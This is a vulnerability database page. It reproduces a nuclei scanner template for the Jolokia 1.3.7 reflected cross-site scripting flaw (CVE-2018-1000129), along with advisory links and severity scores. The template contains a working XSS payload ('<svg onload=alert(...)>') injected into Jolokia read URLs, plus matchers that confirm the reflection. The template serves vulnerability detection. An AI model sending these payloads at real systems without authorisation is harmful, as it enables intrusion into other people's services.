Lucene search
K

Jolokia 1.3.7 - Cross-Site Scripting

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 34 Views

Jolokia 1.3.7 - Cross-Site Scripting vulnerability, allows attacker to execute malicious JavaScript in victim's browser. Upgrade to patched version or apply necessary security patches

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2018-1000129
17 Aug 202521:02
circl
CNVD
Jolokia Agent Cross-Site Scripting Vulnerability
19 Mar 201800:00
cnvd
CVE
CVE-2018-1000129
14 Mar 201813:00
cve
Cvelist
CVE-2018-1000129
14 Mar 201813:00
cvelist
Github Security Blog
Cross-site Scripting in Jolokia agent
14 May 202201:27
github
Hacker One
Mars: Jolokia Reflected XSS
27 Sep 202217:29
hackerone
Hacker One
U.S. Dept Of Defense: [ CVE-2018-1000129 ] RXSS At `https://███████` via the URI
12 Oct 202405:41
hackerone
NVD
CVE-2018-1000129
14 Mar 201813:29
nvd
OSV
GHSA-HFPG-GQJW-779M Cross-site Scripting in Jolokia agent
14 May 202201:27
osv
Prion
Cross site scripting
14 Mar 201813:29
prion
Rows per page
id: CVE-2018-1000129

info:
  name: Jolokia 1.3.7 - Cross-Site Scripting
  author: mavericknerd,0h1in9e,daffainfo
  severity: medium
  description: |
    Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim's browser.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of Jolokia or apply the necessary security patches to mitigate the XSS vulnerability.
  reference:
    - https://jolokia.org/#Security_fixes_with_1.5.0
    - https://github.com/rhuss/jolokia/commit/5895d5c137c335e6b473e9dcb9baf748851bbc5f#diff-f19898247eddb55de6400489bff748ad
    - https://blog.gdssecurity.com/labs/2018/4/18/jolokia-vulnerabilities-rce-xss.html
    - https://blog.it-securityguard.com/how-i-made-more-than-30k-with-jolokia-cves/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000129
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-1000129
    cwe-id: CWE-79
    epss-score: 0.25459
    epss-percentile: 0.97685
    cpe: cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: jolokia
    product: jolokia
  tags: cve2018,cve,jolokia,xss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"
      - "{{BaseURL}}/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<svg onload=alert(document.domain)>"
          - "java.lang.IllegalArgumentException"
          - "No type with name"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210094b1961f59f55041cab66a43da0a1fcfa9eda29c007ca8eea3f8230cde1514cf02205fc64a5e21a1e87e0468a178b68b61ba7c299efd9af190fc23fc1bfd18f0f562:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 24.3
CVSS 36.1
EPSS0.25459
34